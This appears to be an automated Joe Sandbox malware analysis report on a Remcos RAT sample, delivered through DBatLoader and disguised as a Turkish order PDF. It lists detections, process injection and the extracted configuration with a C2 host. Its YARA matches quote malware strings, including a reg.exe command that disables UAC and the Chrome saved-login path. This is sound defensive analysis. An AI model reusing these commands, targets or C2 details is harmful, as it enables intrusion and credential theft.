Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe

Overview

General Information

Sample Name:Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Analysis ID:652390
MD5:8e60c68e832622b0ebd88a612898a9f9
SHA1:99c8a0db1608b7f3fe783829f13a6a594554f142
SHA256:6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
Tags:exegeoTUR
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Contains functionality to capture and log keystrokes
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Contains functionality to steal Firefox passwords or cookies
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionalty to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
IP address seen in connection with other malware
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Eluiezilfw.exe (PID: 6880 cmdline: "C:\Users\Public\Libraries\Eluiezilfw.exe" MD5: 8E60C68E832622B0EBD88A612898A9F9)
    • logagent.exe (PID: 3960 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
  • Eluiezilfw.exe (PID: 5628 cmdline: "C:\Users\Public\Libraries\Eluiezilfw.exe" MD5: 8E60C68E832622B0EBD88A612898A9F9)
    • DpiScaling.exe (PID: 5936 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "Pw`~hustlelord.ddns.net:5017:", "Assigned name": "BIG", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-MZPAVR", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\Libraries\wflizeiulE.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x5a:$hotkey: \x0AHotKey=8
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\Public\Libraries\wflizeiulE.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\Public\Libraries\Eluiezilfw.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            00000008.00000002.348456214.0000000003C4C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
              00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                Click to see the 50 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.logagent.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  3.2.logagent.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
                  • 0x157b8:$s1: \Classes\mscfile\shell\open\command
                  • 0x15830:$s1: \Classes\mscfile\shell\open\command
                  • 0x15798:$s2: eventvwr.exe
                  3.2.logagent.exe.400000.0.unpackRemcos_1Remcos Payloadkevoreilly
                  • 0x16510:$name: Remcos
                  • 0x16888:$name: Remcos
                  • 0x16de0:$name: Remcos
                  • 0x16e33:$name: Remcos
                  • 0x15674:$time: %02i:%02i:%02i:%03i
                  • 0x156fc:$time: %02i:%02i:%02i:%03i
                  • 0x16be4:$time: %02i:%02i:%02i:%03i
                  • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D 0C 72
                  3.2.logagent.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x159e0:$str_b2: Executing file:
                  • 0x16798:$str_b3: GetDirectListeningPort
                  • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x16534:$str_b5: licence_code.txt
                  • 0x1649c:$str_b6: \restart.vbs
                  • 0x163c0:$str_b8: \uninstall.vbs
                  • 0x1596c:$str_b9: Downloaded file:
                  • 0x15998:$str_b10: Downloading file:
                  • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
                  • 0x159fc:$str_b12: Failed to upload file:
                  • 0x167d8:$str_b13: StartForward
                  • 0x167bc:$str_b14: StopForward
                  • 0x16330:$str_b15: fso.DeleteFile "
                  • 0x16394:$str_b16: On Error Resume Next
                  • 0x162fc:$str_b17: fso.DeleteFolder "
                  • 0x15a14:$str_b18: Uploaded file:
                  0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3ad0000.7.unpackJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
                    Click to see the 82 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.337.0.14.1954977850172844577 06/26/22-09:44:11.704757
                    SID:2844577
                    Source Port:49778
                    Destination Port:5017
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.337.0.14.1954977850172845323 06/26/22-09:44:57.649154
                    SID:2845323
                    Source Port:49778
                    Destination Port:5017
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:37.0.14.195192.168.2.35017497782845324 06/26/22-09:44:57.648577
                    SID:2845324
                    Source Port:5017
                    Destination Port:49778
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeReversingLabs: Detection: 21%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeReversingLabs: Detection: 21%
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.6.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4348.64.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acbbdc.14.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.51.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.2.logagent.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac5ecc.84.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.18.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac1b54.30.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac0168.21.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.0.logagent.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.68.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.69.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac7bf0.17.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac413c.59.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac3034.55.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.36.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad28f8.32.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.34.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.39.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad8008.106.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac0168.20.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad17a0.66.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac8560.26.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad9a8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.2324788.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac00d8.18.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac803c.108.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adbf00.62.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adafd8.34.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 15.0.DpiScaling.exe.10540000.3.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad54e0.103.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acd700.50.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad001c.61.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acff08.23.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acc008.6.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.100.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.37.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3addbec.69.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6d08.106.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac7bf0.16.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.22.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4578.12.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac52c8.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.10540000.8.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.70.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac0168.20.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac217c.47.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.101.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.0.logagent.exe.10540000.3.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad54e0.103.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac2dac.51.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.91.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.23a33e8.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.32.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac6924.76.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e240.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acc6a8.43.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac52c8.9.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad94ec.80.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395dda4.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adf8dc.45.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adbf00.63.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac704c.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acbbdc.14.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.56.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad3e08.79.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac6d08.105.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acc6a8.43.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.logagent.exe.10540000.0.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.105.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad94ec.80.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad94ec.82.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.2.logagent.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.2.Eluiezilfw.exe.3168bd8.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.13.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac217c.47.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad4008.91.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.2.Eluiezilfw.exe.10540000.8.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.94.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac2d80.39.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.48.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.5.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac00d8.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acdc40.54.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3add83c.75.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac26fc.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac8008.21.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac26fc.0.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.logagent.exe.10540000.2.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 13.3.Eluiezilfw.exe.3ae4008.36.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac03a8.25.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.0.logagent.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac1b54.29.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.40.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acbbdc.13.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3add83c.75.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.92.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac4578.12.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acc008.6.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.logagent.exe.10540000.3.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac26fc.3.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.25.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad5fb8.44.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.0.logagent.exe.10540000.1.unpackAvira: Label: TR/Crypt.Morphine.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac217c.48.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac2d80.39.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3add83c.74.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad5fb8.42.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3adbf00.63.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad4008.93.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.96.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3acd700.52.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.29.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.10.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad46cc.98.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3aca22c.30.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acff08.23.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.104.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.107.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.2.Eluiezilfw.exe.2364588.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.1.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac52c8.8.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acc6a8.41.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ac03a8.27.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 3.2.logagent.exe.1054198f.2.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad54e0.102.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.62.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.41.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397001c.60.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac2dac.49.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.38.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac4ae4.72.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3addbec.68.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 8.3.Eluiezilfw.exe.3ac2d80.40.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3acd700.52.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3ad46cc.95.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.102.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 14.2.logagent.exe.1054198f.2.unpackAvira: Label: BDS/Backdoor.Gen
                    Source: 8.3.Eluiezilfw.exe.3ad3e08.77.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 13.3.Eluiezilfw.exe.3adf8dc.46.unpackAvira: Label: TR/Patched.Ren.Gen
